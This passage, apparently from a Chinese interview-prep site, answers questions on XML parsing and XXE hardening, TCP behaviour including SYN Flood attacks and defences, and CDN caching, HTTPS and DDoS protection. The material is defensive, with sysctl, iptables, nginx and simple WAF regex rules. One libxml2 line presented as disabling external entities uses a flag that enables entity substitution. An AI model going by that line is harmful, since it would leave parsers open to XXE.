DocumentBuilderFactory.newInstance();dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);// 如果必须用 DTD，至少禁用外部实体dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);Python（lxml）：from lxml import etreeparser = etree.XMLParser(resolve_entities=False)tree = etree.parse("input.xml", parser)libxml2 全局禁用：xmlCtxtUseOptions(parser, XML_PARSE_NOENT, NULL);关键原则：默认禁用外部实体，只在确实需要的场景有条件地开启。实体的替代方案现代 XML 开发中，实体尤其是外部实体的使用在减少，有两个更好的替代：XIncludeXInclude 是 W3C 标准的包含机制，不依赖 DTD，不触发 XXE：<book xmlns:xi="http://www.w3.org/2001/XInclude"> <title>系统设计手册</title> <xi:include href="chapter1.xml"/> <xi:include href="chapter2.xml"/></book>XML Schema 的 fixed 属性对于内部实体"定义常量"的用途，Schema 的 fixed 属性可以替代：<xs:element name="version" type="xs:string" fixed="2.3.1"/>使用建议内部实体：放心用，复用短文本的好工具，但别过度——如果实体名比内容还长就没必要外部实体：生产环境尽量别用，用 XInclude 替代参数实体：维护大型 DTD 时很有用，但大部分项目已经转向 Schema，参数实体的使用场景在萎缩预定义实体：不需要特别记，编辑器会自动转义；手写 XML 时注意 < 和 & 必须转义安全第一：任何接收外部 XML 输入的接口，都要禁用外部实体解析，这是最低限度的安全措施

计算机基础阅读 05月28日 03:47

XML 文档格式良好和有效有什么区别？

格式良好是 XML 的语法底线——标签必须闭合、正确嵌套、单一根元素、属性值加引号、特殊字符转义。解析器碰到不格式良好的文档直接报错，根本不会继续处理。有效是在格式良好的基础上，再对照 DTD 或 XML Schema 检查语义约束——元素顺序对不对、必填字段有没有缺、数据类型匹不匹配。一个文档可以格式良好但无效（语法没问题但违反了 Schema 约束），但有效的一定格式良好。核心区别：格式良好只管"能不能解析"，有效还要管"符不符合业务规则"。前者是 XML 规范的硬性要求，后者取决于你定义的 Schema。追问DTD 和 XML Schema 有什么区别？| 维度 | DTD | XML Schema ||------|-----|------------|| 数据类型 | 只有文本，没有类型 | 支持 string、integer、date 等丰富类型 || 命名空间 | 不支持 | 原生支持 || 语法 | 自有一套非 XML 语法 | 本身就是 XML 文档 || 扩展性 | 弱 | 支持复杂类型继承、约束facet || 现状 | 遗留系统在用，新项目不推荐 | 主流方案 |实际项目里怎么选验证方式？配置文件（Spring、Maven）通常自带 Schema 声明，解析时自动验证。数据交换场景建议用 XSD 做强校验，防止对方传过来的结构不符合约定。开发阶段开验证、生产环境看性能需求可以关掉——Schema 验证有开销。格式良好但无效的文档能被解析吗？能。解析器分两类：非验证型解析器只检查格式良好性，不会因为违反 Schema 就拒绝解析。只有开启验证模式的解析器才会同时检查有效性。所以一个缺了必填字段的 XML，照样能被 DOM/SAX 解析成树结构，只是语义上不合规。什么时候 XML 不格式良好也不会报错？用了容错解析器（比如浏览器的 HTML 解析器），或者解析时开了 recover 模式。但标准 XML 解析器遇到格式错误必须报告 fatal error，这是 XML 规范的硬要求——和 HTML 的"宽容解析"不同，XML 的设计哲学就是宁可报错也不要猜。写段代码// 开启 Schema 验证SchemaFactory sf = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);Schema schema = sf.newSchema(new File("book.xsd"));DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();dbf.setSchema(schema); // 设置 Schema 后解析时自动验证

计算机基础阅读 05月28日 03:47

XML 解析中 DOM 和 SAX 有什么区别？

DOM 把整个 XML 一次性加载到内存建树，SAX 逐行读、遇到标签就触发回调。所以 DOM 能随机访问、能改，但吃内存；SAX 省内存、速度快，但只能顺序读、不能改。面试里一般答到"一个树一个事件驱动"就算到位，但追问肯定会问更细。追问DOM 和 SAX 的内存差距到底有多大？解析一个 100MB 的 XML，DOM 可能吃掉 300-500MB 内存（树节点的对象开销远大于原始文本），SAX 基本只占几 KB 的缓冲区。大文件用 DOM 直接 OOM 是真实生产事故，不是理论风险。StAX 和 SAX 有什么区别？为什么有了 SAX 还要 StAX？SAX 是推模型——解析器主动推事件给你，你没法控制解析节奏。StAX 是拉模型——你调用 next() 主动拉下一个事件，想停就停，想跳就跳。实际开发中 StAX 更灵活，代码也更好写（不用写一堆回调）。JDK 6 开始 StAX 就是 JAXP 的一部分了。实际项目里怎么选？| 场景 | 选择 | 原因 ||------|------|------|| 配置文件（几十 KB） | DOM / Dom4j | 小文件内存不是问题，随机访问方便 || 大日志文件（几百 MB+） | SAX / StAX | 流式处理不爆内存 || 需要修改 XML 再写回 | DOM | SAX 只读，改不了 || 只提取少数字段 | SAX / StAX | 不用为几个字段加载整棵树 |JAXB 还在用吗？Java 9 标记废弃，Java 11 正式移除（从 JDK 里删了）。现在要用得手动加 jakarta.xml.bind 依赖。新项目如果要做 XML-对象映射，Jackson 的 XML 模块比 JAXB 好用。DOM 解析有什么常见坑？编码问题：XML 声明的 encoding 和文件实际编码不一致，直接乱码或抛异常空白节点：格式化缩进会产生大量 #text 空白节点，遍历时要 getNodeType() 过滤，否则逻辑全乱命名空间：带命名空间的 XML 必须用 getElementsByTagNameNS()，用错方法查不到元素实体注入：外部实体引用（XXE）是安全漏洞，解析时必须禁用：factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true)写段代码StAX 拉式解析，对比上面 SAX 的回调写法，感受下代码简洁度的差距：XMLStreamReader reader = XMLInputFactory.newInstance() .createXMLStreamReader(new FileInputStream("data.xml"));while (reader.hasNext()) { if (reader.next() == START_ELEMENT && reader.getLocalName().equals("title")) { System.out.println(reader.getElementText()); }}

计算机基础阅读 05月28日 03:46

XML 属性和子元素有什么区别？什么时候该用哪个？

XML 属性适合放元数据——ID、类型、状态这类简单的键值对；子元素适合放实际数据和可能变复杂的内容。属性的硬限制是：只能存纯文本、同一元素内不能重复、不能嵌套子结构。所以只要信息有可能扩展、可能多值、可能变复杂，就应该用子元素。一个实用的判断方法：如果你犹豫"这个该放属性还是子元素"，大概率该用子元素。属性只在你非常确定它永远是一个简单原子值时才用。W3C 和 Google XML Style Guide 的建议一致：元数据用属性，数据本身用子元素。追问属性和子元素的核心区别是什么？属性是开始标签上的 name="value" 对，值只能是纯文本，同名属性在同一元素内只能出现一次。子元素是嵌套在父元素内的独立元素，可以重复、可以嵌套、可以有混合内容（文本和子元素混排），且保持文档顺序。用代码看最直观：<book id="B001" category="programming" lang="zh"> <title>XML 实战</title></book><book> <id>B001</id> <categories> <category>programming</category> <category>reference</category> </categories></book>category 如果可能多值，属性就搞不定——它不能重复，只能用子元素。实际项目里选错会怎样？配置文件把数据库连接参数全写成属性：<db driver="mysql" host="127.0.0.1" port="3306"/>后来要给 host 加 failover 列表、给连接加 SSL 配置，属性扩展不了，只能全部拆成子元素重写。如果一开始就用子元素，加字段只是多写几行的事。再比如 SOAP 协议里，早期版本大量使用属性传业务数据，后来扩展性需求上来后不得不迁移到子元素，导致版本兼容成了大坑。Google 和 W3C 的官方建议是什么？Google XML Style Guide 明确说：属性只用于 ID 引用等元数据，其他一律用子元素。W3C 的 XML 推荐标准虽然没有强制规定，但示例中始终把元数据（id、class）放属性，内容数据放子元素。两条规则的内核一样——属性是"关于数据的数据"，子元素是"数据本身"。有没有属性确实更合适的场景？HTML/SVG 是属性发挥优势的典型场景：<div id="main" class="container">、<rect x="10" y="20" width="100"/>——id、class、坐标、尺寸都是纯元数据，不会变复杂，用属性比嵌套子元素简洁得多，解析也更快。另外在 SAX 流式解析中，一个元素的所有属性一次性报出，而子元素逐个触发事件。如果你需要快速读取元数据做路由分发，属性在性能上有微小优势。属性值有长度限制吗？多行文本能放属性吗？XML 规范没有规定属性值长度上限，但实际中有两个问题：很多 SAX 解析器实现在属性值超过一定长度时性能下降甚至截断；更关键的是，属性值中的换行符会被 XML 解析器规范化为空格——多行文本放属性里会丢失格式。所以长文本、多行内容、含换行的代码片段，必须用子元素。写段代码<book id="B001" isbn="978-0-123456-78-9" lang="zh"> <title>XML 实战</title> <authors> <author>张三</author> <author>李四</author> </authors></book>

计算机基础阅读 05月27日 22:51

TCP 和 UDP 的主要区别是什么？

答案速览TCP 面向连接、可靠传输、一对一通信，代价是延迟高、开销大；UDP 无连接、不保证可靠、支持一对多，优势是快。面试中一句话总结：要可靠选 TCP，要速度选 UDP。核心区别| 维度 | TCP | UDP ||------|-----|-----|| 连接 | 三次握手建立，四次挥手断开 | 无连接，直接发 || 可靠性 | 确认应答+重传+校验，保证不丢不重不乱 | 尽力交付，可能丢包乱序 || 传输方式 | 面向字节流 | 面向报文，保留边界 || 流量/拥塞控制 | 滑动窗口+慢启动+拥塞避免 | 无 || 通信模式 | 仅一对一 | 一对一/一对多/多对多 || 首部开销 | 最少 20 字节 | 固定 8 字节 |理解的关键不在背表，而在为什么：TCP 的每一个"可靠"特性（确认、重传、序号、窗口）都是有代价的——更多握手、更大首部、更低效率。UDP 丢掉这些，换来的是简单和快速。适用场景怎么选TCP：HTTP/HTTPS、FTP、SSH、数据库连接——数据不能丢的场景UDP：视频会议、直播、在线游戏、DNS 查询——延迟比完整性更重要的场景面试常见的陷阱题：DNS 既用 UDP 又用 TCP，为什么？普通查询用 UDP（快），响应超过 512 字节或区域传输时切 TCP（可靠）。这说明选协议不是非此即彼，而是按场景取舍。面试追问三次握手为什么不能两次？——两次无法确认客户端接收能力，可能产生死连接为什么视频通话用 UDP 而不重传丢包？——重传到达时画面已经过了，不如跳过QUIC 为什么基于 UDP 而不是 TCP？——TCP 的握手和拥塞控制内核实现，无法快速迭代；UDP 在用户态可实现同等可靠性和更快的连接建立

计算机基础阅读 05月27日 22:48

TCP SYN Flood 攻击的原理和防御方法是什么？

攻击原理：三次握手的致命缺陷TCP 建立连接需要三次握手：客户端发 SYN，服务器回 SYN+ACK 并分配资源等待 ACK，客户端确认后连接建立。SYN Flood 攻击正是利用第二步——攻击者发送大量伪造源 IP 的 SYN 包，服务器为每个请求分配半连接资源并等待永远不会到来的 ACK，直到半连接队列被填满，正常请求无法处理。核心危害：半连接队列（SYN Queue）被占满 → 新连接被丢弃 → 服务不可用。每个半连接约占 200 字节内存，攻击者用极低成本即可耗尽服务器资源。防御方法（按实战优先级排列）SYN Cookie——最核心的防御服务器收到 SYN 时不分配半连接资源，而是将连接信息编码到 SYN+ACK 的初始序列号（Cookie）中。收到合法 ACK 后，通过验证 Cookie 还原连接状态。sysctl -w net.ipv4.tcp_syncookies=1追问：SYN Cookie 的局限？会禁用 TCP 窗口缩放和 SACK 等选项，影响高延迟链路性能；Cookie 可被暴力猜解，不适用于超高带宽攻击。调整内核参数——配合 Cookie 的辅助手段# 增大半连接队列sysctl -w net.ipv4.tcp_max_syn_backlog=8192# 减少重试次数，加速释放sysctl -w net.ipv4.tcp_synack_retries=2增大 backlog 只是延缓耗尽，不能根治；缩短超时可能影响高延迟正常连接，需根据业务权衡。网络层限速与过滤iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j ACCEPTiptables -A INPUT -p tcp --syn -j DROP单 IP 限速可防小规模攻击，但分布式攻击下效果有限，且可能误伤 NAT 出口用户。生产环境建议使用专业 DDoS 防护服务（Cloudflare、AWS Shield 等）做流量清洗。如何检测 SYN Flood？netstat -n | grep SYN_RCVD | wc -l 大量 SYN_RCVD 状态连接ss -s 观察 sockets 统计异常监控系统 SYN 收包速率突增检测到攻击后，优先启用 SYN Cookie，再结合限速和外部清洗逐步缓解。与 UDP Flood、HTTP Flood 相比，SYN Flood 靶向传输层，防御手段更成熟，但仍是互联网上最经典的 DDoS 攻击方式之一，1996 年至今未被根治。

计算机基础阅读 05月27日 22:48

TCP TIME_WAIT 状态的作用和问题是什么？

答案：TIME_WAIT 是主动关闭方在四次挥手最后发送 ACK 后进入的等待状态，持续 2MSL，核心作用是保证连接可靠终止和防止旧报文干扰新连接主动关闭方发送最后一个 ACK 后不能直接关闭，必须等待 2MSL（最大报文生存时间，Linux 默认 60 秒）。这段等待有两个目的：第一，兜底最后的 ACK。如果这个 ACK 丢了，对端会重传 FIN，TIME_WAIT 状态下还能重发 ACK 响应。没有这个等待，ACK 丢失后对端永远收不到确认，连接无法正常关闭。第二，让网络中的残留报文过期。同一个四元组（源IP、源端口、目的IP、目的端口）可能很快建立新连接，旧连接的延迟报文如果还没消失，会被新连接误收。等 2MSL 后这些报文必然被丢弃，不会串扰。TIME_WAIT 带来的实际问题高并发短连接场景下，大量连接同时处于 TIMEWAIT，会导致端口耗尽。客户端可用端口约 6 万个，每个 TIMEWAIT 占一个，当并发远超这个数，新连接报 "address already in use"。服务端主动关闭连接时问题更突出。HTTP/1.0 默认 connection: close，服务端每次响应后主动关连接，短时间积累大量 TIME_WAIT。怎么解决实际工程中常用三种手段配合：开启 tcptwreuse：允许将 TIMEWAIT 状态的连接端口分配给新连接，前提是开启了 TCP 时间戳（tcptimestamps=1），用时间戳区分新旧连接，比单纯缩短等待更安全。用长连接和连接池：根本思路是减少连接的频繁创建和销毁。HTTP/1.1 默认 keep-alive，数据库连接池复用连接，都是这个逻辑。扩大端口范围：调整 iplocalport_range 到 "1024 65535"，治标不治本但能缓解。# Linux 常用配置sysctl -w net.ipv4.tcp_tw_reuse=1sysctl -w net.ipv4.tcp_timestamps=1sysctl -w net.ipv4.ip_local_port_range="1024 65535"注意 tcp_tw_recycle 在 NAT 环境下会导致连接失败，Linux 4.12 后已移除该参数，不要用。面试追问为什么是 2MSL 而不是 1MSL？ ACK 最多存活 1MSL 到达对端，对端重传的 FIN 也最多存活 1MSL 回来，加起来恰好 2MSL，覆盖了两个方向的最坏情况。服务端出现大量 TIME_WAIT 说明什么？说明服务端在主动关闭连接。检查是否 HTTP 响应头缺了 keep-alive，或者业务逻辑在用完连接后主动 close 而非复用。客户端出现大量 TIME_WAIT 呢？客户端用短连接高频请求服务端，每次自己主动关连接。排查是否可以用连接池或长连接替代。

计算机基础阅读 05月27日 22:44

TCP 粘包问题是什么？如何解决？

TCP 粘包问题是什么？如何解决？TCP 粘包是指发送方多次 send 的数据，在接收方被一次性 read 出来，多个消息"粘"在了一起。根本原因是 TCP 是字节流协议，不维护消息边界——它只保证数据可靠、按序到达，但不关心你这条消息从哪开始到哪结束。粘包是怎么产生的？发送端：Nagle 算法。多个小包攒成一个大包再发，减少网络开销。这意味着你连续调用两次 send，数据可能被合并成一个 TCP 段发出。接收端：缓冲区读取时机。应用层 read 的速度慢于数据到达速度，缓冲区里攒了好几条消息，一次 read 全取出来了。注意：粘包不是 TCP 的 bug，而是字节流协议的设计特性。UDP 就不会有这个问题，因为 UDP 保留消息边界，每次 sendto 对应一次 recvfrom。怎么解决？核心思路：在应用层定义消息边界。1. 固定长度：每条消息固定 N 字节，不够补齐。简单但浪费带宽，实际很少用。2. 分隔符：消息之间用特殊字符（如 \n）分隔。HTTP/1.1 就是用 \r\n\r\n 分隔头部和 body。缺点是消息内容本身包含分隔符时要转义，处理麻烦。3. 长度前缀（最常用）：消息头加一个字段表示 body 长度，接收方先读长度再读对应字节数。绝大多数二进制协议都用这种方式。import structdef send_msg(sock, data: bytes): # 前4字节表示消息长度，大端序 sock.sendall(struct.pack('!I', len(data)) + data)def recv_msg(sock): # 先读4字节拿到长度 raw = _recv_exact(sock, 4) length = struct.unpack('!I', raw)[0] # 再读对应长度的body return _recv_exact(sock, length)def _recv_exact(sock, n): buf = b'' while len(buf) < n: chunk = sock.recv(n - len(buf)) if not chunk: raise ConnectionError('连接断开') buf += chunk return buf面试追问Q: 关掉 Nagle 算法能解决粘包吗？不能。设置 TCP_NODELAY 只解决发送端的合并问题，接收端缓冲区仍然可能一次读出多条消息。粘包的本质是缺乏消息边界，必须由应用层协议解决。Q: 什么时候不需要处理粘包？如果连续发送的数据本身就是一个整体（比如传文件），那接收端粘在一起反而是正确的，不需要额外处理。只有当每条消息是独立的、需要分别处理时，才必须定义边界。Q: 长度前缀方案，长度字段本身被拆包了怎么办？这正是 _recv_exact 函数存在的意义——用循环确保读满指定字节数。这是处理拆包的标准做法。

计算机基础阅读 05月27日 22:32

CDN 缓存策略有哪些？命中率怎么优化？

直接回答CDN 缓存策略核心就三件事：控制缓存多久（TTL）、区分缓存谁（Cache Key）、决定何时更新（刷新机制）。优化命中率的关键是：减少回源、合理分 TTL、忽略无关参数、预热热门资源。缓存策略拆解TTL 策略——最基础的缓存控制TTL 决定内容在边缘节点的存活时间：静态资源（图片、字体、CSS/JS 带 hash）：设长 TTL，甚至 max-age=31536000, immutable半静态内容（商品页、文章页）：分钟级 TTL，配合软刷新动态接口（用户数据、实时行情）：不缓存或秒级 TTL，走协商缓存（ETag / Last-Modified）Cache-Control: public, max-age=31536000, immutable // 带 hash 的静态资源Cache-Control: public, max-age=300, s-maxage=60 // CDN 缓 60s，浏览器缓 5minCache-Control: no-cache, ETag: "v2-abc" // 协商缓存Cache Key 策略——决定哪些请求共享缓存默认 Cache Key 是完整 URL。问题在于：?utm_source=weibo 和 ?utm_source=zhihu 本是同一资源，却被分成两条缓存，白白回源。优化方式：忽略无关查询参数：过滤 utm_*、timestamp 等不影响内容的参数自定义 Cache Key：加入 Cookie 中的地区码，忽略 PHPSESSIDVary 头：让 CDN 按 Accept-Encoding 区分 gzip/br 版本分层缓存——边缘 → 区域 → 源站请求查找顺序：边缘节点 → 区域节点 → 源站。边缘未命中会回区域，区域未命中才回源。所以优化重点是让请求尽量在边缘命中。命中率优化实战1. 忽略 URL 参数这是命中率低最常见的原因。一条 ?token=xxx 就能让缓存全部失效。阿里云 CDN 实测：忽略无关参数后命中率可从 40% 提升到 90%+。2. 大文件分片回源（Range 回源）用户看视频只看了前 5 分钟，但 CDN 回源拉了整个文件。开启 Range 回源后只拉需要的片段，减少回源流量，也提升字节命中率。3. 缓存预热新版本发布或大促前，主动把热门资源推到各边缘节点。两种方式：API 预热：调用 CDN 控制台接口主动推送模拟请求：用脚本批量请求触发被动缓存4. 版本化发布代替刷新与其发版后全站刷新缓存，不如在文件名里带 hash：app.3f2a1b.js。内容变了 hash 就变，旧缓存自然过期，无需主动刷新。5. 监控命中率指标请求命中率 = 缓存命中请求数 / 总请求数字节命中率 =（边缘响应流量 - 回源流量）/ 边缘响应流量请求命中率 >90% 为健康，70%-90% 需要优化，<70% 必须排查。追问：内容更新后用户还看到旧版本怎么办？三层解法，按优先级：文件名带 hash，一劳永逸（最推荐）URL 刷新，精确清除单条缓存全站刷新，最后手段，会瞬间压高源站追问：缓存命中率突然下降怎么排查？按这个顺序查：看是否有新参数打入了 Cache Key（查访问日志里的 URL 变体）看源站是否返回了 no-store / private 头看 TTL 是否被覆盖缩短看是否有大流量回源（可能是爬虫或攻击绕过缓存）

计算机基础阅读 05月27日 22:21

CDN 如何配置 HTTPS？三种回源模式有什么区别？

直接回答CDN 配置 HTTPS 主要有三种方式：自定义证书上传、CDN 免费证书、SNI 多域名证书。HTTPS 回源模式分三档：Flexible（仅客户端加密）、Full（全链路加密但不验证源站证书）、Full Strict（全链路加密且严格验证源站证书），生产环境应选 Full Strict。HTTPS 配置方式自定义证书上传：购买或申请 SSL 证书后，在 CDN 控制台上传 .crt 证书和 .key 私钥。优点是完全可控，支持通配符和 EV 证书；缺点是需手动续期。CDN 免费证书：主流 CDN 支持 Let's Encrypt 等免费证书，自动签发和续期，适合中小站点。Cloudflare 的 Universal SSL 就属此类。SNI 方式：CDN 在同一 IP 上通过 SNI 区分不同域名的证书，客户端握手时携带域名，服务端返回对应证书。现代浏览器均支持。# Cloudflare 启用 Universal SSL 示例curl -X PATCH "https://api.cloudflare.com/client/v4/zones/{zone_id}/settings/ssl" \ -H "Authorization: Bearer {api_token}" \ -H "Content-Type: application/json" \ -d '{"value":"strict"}'三种 HTTPS 回源模式这是面试核心，务必理解三者区别：Flexible：用户→CDN 走 HTTPS，CDN→源站走 HTTP。源站无需证书，但回源链路明文传输，存在中间人风险。仅适合测试环境或纯静态内容。Full：全链路 HTTPS，但 CDN 不验证源站证书是否合法（自签名证书也接受）。比 Flexible 安全，但无法防御源站侧的证书伪造攻击。Full Strict：全链路 HTTPS + 严格证书验证，要求源站证书由受信 CA 签发且域名匹配。安全性最高，证书异常会直接拒绝连接。金融、政务等场景必选。关键配置实践强制 HTTPS 跳转和 HSTS 是标配：# Nginx 强制跳转server { listen 80; return 301 https://$host$request_uri;}# HSTS 响应头add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;SSL 协议只保留 TLS 1.2 和 1.3，禁用弱加密套件。启用 OCSP Stapling 减少握手延迟，配置会话缓存复用 SSL 连接：ssl_protocols TLSv1.2 TLSv1.3;ssl_ciphers ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-GCM-SHA256;ssl_session_cache shared:SSL:10m;ssl_stapling on;ssl_stapling_verify on;常见坑无限重定向循环：CDN 开启强制 HTTPS，源站又把 HTTPS 重定向回 HTTP，形成死循环。解决办法是源站只监听 80 端口或正确识别 CDN 传递的 X-Forwarded-Proto 头。混合内容警告：HTTPS 页面加载了 HTTP 资源，浏览器会拦截。用 CSP 头自动升级：Content-Security-Policy: upgrade-insecure-requests。证书链不完整：只上传了域名证书缺少中间证书，导致客户端无法验证。解决：按域名证书→中间证书的顺序拼接后上传。追问方向SNI 在什么场景下会失效？老旧客户端（IE6/Windows XP）不支持 SNI，CDN 如何兼容？如果源站证书过期，Full Strict 模式下会发生什么？如何做到零停机续期？CDN 开启 HSTS 后源站切换回 HTTP 会有什么后果？

计算机基础阅读 05月27日 22:21

CDN 如何实现视频加速？有哪些关键技术？

CDN 如何实现视频加速？有哪些关键技术？CDN 视频加速的核心思路：把视频切片、多码率编码、缓存在离用户最近的边缘节点，播放时根据网络状况动态选择码率和分片，从而降低首屏时间、减少卡顿。一、自适应码率（ABR）播放器实时检测带宽和缓冲区水位，动态切换码率档位。主流 ABR 算法分三类：基于缓冲区：缓冲区低选低码率，充足选高码率，实现简单但反应慢基于吞吐量：用近期下载速率预估带宽，选不超过带宽的最高码率，反应快但波动大混合算法：同时参考缓冲区和吞吐量，BOLA 和 MPC 是工业界常用方案追问：ABR 切换时为什么会出现画面模糊再清晰？因为切换发生在分片边界，中间需要等当前分片播完才能请求新码率分片，这段时间画面保持旧码率。二、视频编码优化| 编码格式 | 相比 H.264 体积 | 编码速度 | 兼容性 | 典型场景 ||---------|----------------|---------|--------|---------|| H.264 | 基准 | 快 | 最好 | 通用点播 || H.265 | 小 50% | 慢 3-5x | 较差 | 高清/带宽受限 || AV1 | 小 60% | 极慢 | 有限 | 未来/超高清 |生产中通常生成多码率多分辨率版本（码率阶梯），编码参数重点控制：GOP 大小（关键帧间隔）、maxrate/bufsize（码率上限）、帧率（动态场景 60fps，静态 24fps）。三、流媒体协议：HLS vs DASHHLS（Apple 主导）：m3u8 播放列表 + .ts 分片，生态成熟，iOS 原生支持。DASH（MPEG 标准）：mpd（XML）+ .m4s 分片，跨平台，灵活度更高。两者都能跑在纯 HTTP 上，天然适配 CDN 缓存。CMAF 格式让 HLS 和 DASH 共用同一套 fMP4 分片，只需维护两份 manifest，存储成本减半。追问：直播场景下 HLS 延迟为什么高？如何优化？HLS 延迟 = 分片时长 x 3（编码缓冲 + 播放列表刷新 + 缓冲区预载）。优化方向：缩短分片到 2-4 秒、用 LL-HLS 的部分分片预加载、或改用 WebRTC/FLV 方案。四、CDN 缓存策略分片缓存：每个 .ts/.m4s 独立缓存，命中率高，TTL 可设较长（1-24h）播放列表缓存：.m3u8/.mpd 动态更新，TTL 短（直播 5s，点播 5min）缓存锁：proxy_cache_lock 防止同一分片并发回源击穿缓存智能预加载：播放器预取后续 2-3 个分片和下一码率档位五、传输层优化HTTP/2 多路复用减少连接数、头部压缩降低开销；HTTP/3（QUIC）基于 UDP 减少握手延迟、改善弱网拥塞控制。点播用 HTTP 足够，直播低延迟场景倾向 UDP（WebRTC）。六、播放体验优化首屏慢的典型链路：DNS 解析 → TCP 连接 → TLS 握手 → 请求 m3u8 → 请求分片 → 解码首帧。优化手段：预连接、初始选低码率快速起播、增加关键帧频率（GOP 缩小到 1-2 秒）、预加载首屏分片。拖动进度条时，需要定位到目标时间对应的关键帧所在的分片。关键帧间隔越短，seek 响应越快，但编码效率略降。七、质量监控关键指标：首屏时间、卡顿率、码率切换频率、平均播放码率。播放端通过 waiting/playing 事件采集缓冲数据，定时上报，服务端做聚合告警。追问：卡顿率高但码率切换少，可能是什么原因？ABR 没有及时降码率，可能是吞吐量估算偏高、缓冲区水位阈值设置过高，或者分片缓存未命中导致回源延迟。

计算机基础阅读 05月27日 22:21

CDN 如何防御 DDoS 攻击？有哪些安全防护机制？

CDN 能防住 DDoS 吗？核心机制是什么CDN 确实能防御 DDoS，但靠的不是单点硬扛，而是分布式架构把攻击流量"化整为零"。核心思路：隐藏源站 IP + 全球节点分散流量 + 智能清洗恶意请求。DDoS 防护：流量清洗是关键CDN 防御 DDoS 的核心是流量清洗——在边缘节点识别并过滤恶意流量，只把正常请求回源。清洗分三层：L3/L4 网络层：过滤 SYN Flood、UDP Flood、ICMP Flood 等协议级攻击。边缘节点直接丢弃不符合 TCP/IP 规范的畸形包，对特定攻击源 IP 在骨干网层面封禁L7 应用层：分析 User-Agent、Cookie、TLS 指纹等，用 JS Challenge 或滑块验证判断请求是否来自真人。AI 行为分析会给每个请求打信誉分，低分直接拦截Anycast 架构：攻击流量根据地理位置被吸引到最近的边缘节点，把大规模分布式攻击拆成多个小流量就地处理，不集中到单点限流是清洗的辅助手段：# 单 IP 限流limit_req_zone $binary_remote_addr zone=api:10m rate=10r/s;location /api/ { limit_req zone=api burst=20 nodelay;}WAF：应用层攻击的防火墙WAF（Web Application Firewall）防护 SQL 注入、XSS、CSRF、文件包含等 Web 攻击：输入验证：过滤用户输入中的恶意载荷输出编码：对响应内容编码，防止 XSS 执行规则匹配：基于正则或签名库拦截已知攻击模式# 防注入和 XSSif ($args ~* "union.*select.*from") { return 403; }if ($args ~* "<script|javascript:") { return 403; }WAF 部署模式：反向代理（CDN 作为代理入口）、透明代理（旁路拦截）、DNS 模式（通过 DNS 重定向引流）。访问控制：限源、限地、防盗链IP 黑白名单——直接放行或封禁特定 IP 段：allow 192.168.1.0/24;deny all;地理位置限制——仅允许特定国家/地区访问，或屏蔽高风险地区：geo $allowed_country { default no; CN yes;}if ($allowed_country = no) { return 403; }Referer 检查——防盗链，阻止第三方直接引用你的资源：valid_referers none blocked example.com *.example.com;if ($invalid_referer) { return 403; }加密传输与 Token 鉴权HTTPS + HSTS 保证传输层安全。Token 认证防止资源被非法访问——服务端用密钥、路径、时间戳生成签名，CDN 边缘校验签名合法性：import hashlib, timedef generate_token(secret, path, ts): return hashlib.sha256(f"{secret}{path}{ts}".encode()).hexdigest()爬虫防护识别合法爬虫（如 Googlebot）放行，恶意爬虫限流或封禁。方法：User-Agent 分析、行为模式识别、访问频率监控。分层防御才是正确姿势单一机制防不住复杂攻击，生产环境必须分层：用户 → CDN 边缘节点（流量清洗） → WAF（应用层防护） → 源站（深度防御）边缘节点：基础过滤、限流、清洗WAF：应用层攻击拦截源站：最小权限、定期审计、应急响应面试回答时记住：CDN 防御 DDoS 靠分布式 + 智能清洗，不是硬扛；应用安全靠 WAF + 访问控制组合拳；生产环境必须分层，没有银弹。追问：CDN 能防住多大规模的 DDoS？看厂商能力。主流高防 CDN 的 Anycast 网络总带宽可达 10Tbps+，远超单机高防的 1Tbps 上限。关键在于 Anycast 架构能把流量分散到全球节点，不是靠一台机器硬抗。

计算机基础阅读 05月27日 22:19

CDN 性能监控有哪些核心指标？怎么搭建监控体系？

CDN 性能监控的五个核心指标缓存命中率——CDN 监控的第一指标。命中率 = 缓存命中请求数 / 总请求数 × 100%，静态资源目标 95% 以上，整体 90% 以上。命中率骤降往往意味着缓存键配置错误或 TTL 过短，这是面试最爱追问的点。TTFB（首字节时间）——从请求发出到收到第一个字节的耗时，包含 DNS 解析、TCP 连接、TLS 握手和服务器处理。静态内容 P95 应低于 100ms，动态内容低于 500ms。注意：要分开统计命中和未命中的 TTFB，否则平均值会掩盖问题。回源率——回源请求数占总请求的比例，目标低于 10%。回源率高直接导致源站压力大、用户延迟高。面试常见追问：缓存命中率突然从 95% 掉到 60%，你怎么排查？思路：检查是否有大范围缓存失效（批量 purge）、缓存键是否冲突、TTL 是否被改短。错误率——4xx 和 5xx 占总请求比例，4xx 目标低于 0.1%，5xx 低于 0.01%。5xx 飙升通常意味着源站过载或 CDN 节点异常，4xx 激增则可能是配置错误（如回源 URL 改了但 CDN 规则没更新）。带宽与 QPS——带宽监控分边缘带宽和回源带宽，QPS 关注峰值和均值。流量突增需要区分是正常业务高峰还是攻击，结合错误率和延迟一起判断。监控体系怎么搭三层架构：数据采集 → 存储/计算 → 可视化/告警。采集层用 CDN 厂商的日志流（Cloudflare Logs、AWS CloudFront 实时日志）或自建 Nginx 日志，关键字段包括 request_time、upstream_cache_status、upstream_response_time。存储计算层用 Prometheus 做指标聚合，ELK 做日志检索。可视化用 Grafana 搭看板，按地域、ISP、内容类型分维度展示。告警规则要设置三个：TTFB P95 超阈值持续 5 分钟、缓存命中率低于 80% 持续 10 分钟、5xx 错误率超 1% 持续 3 分钟。告警通道走企业 IM + 值班电话，5xx 告警级别必须高于延迟告警。面试追问方向缓存命中率低怎么优化？检查缓存键是否包含不必要的动态参数、TTL 是否合理、是否需要分层缓存（parent cache + edge cache）。如何区分 CDN 问题还是源站问题？对比命中请求和未命中请求的 TTFB，如果命中请求也慢，问题在 CDN 层；如果只有未命中慢，问题在源站或回源链路。多 CDN 怎么监控？统一指标口径，用同一套 Grafana 看板对比各厂商的命中率、延迟和错误率，按地域做流量调度。掌握五个核心指标（命中率、TTFB、回源率、错误率、带宽/QPS）加一套采集-存储-告警的完整方案，面试基本够用。

计算机基础阅读 05月27日 22:18

